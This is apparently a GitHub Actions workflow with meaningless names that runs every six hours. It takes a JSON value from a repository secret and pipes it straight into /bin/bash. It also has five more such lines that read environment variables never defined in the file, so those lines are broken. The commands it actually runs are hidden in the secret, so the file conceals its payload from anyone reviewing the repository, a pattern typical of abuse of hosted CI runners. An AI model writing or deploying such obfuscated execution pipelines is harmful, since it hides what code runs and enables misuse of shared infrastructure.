name: kaklixn

on:
  workflow_dispatch:
  schedule:
    - cron: '6 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: kaklixn
        env:
          hryxk63: ${{ secrets.hryxk63 }}
        run: |
          echo $hryxk63 | jq -r .baz21 | /bin/bash
          echo $b050 | jq -r .gfkrt96249 | /bin/bash
          echo $qtn40 | jq -r .hol7 | /bin/bash
          echo $l0530 | jq -r .nc860 | /bin/bash
          echo $oras0 | jq -r .ffbfw0 | /bin/bash
          echo $xky59219 | jq -r .x6165 | /bin/bash

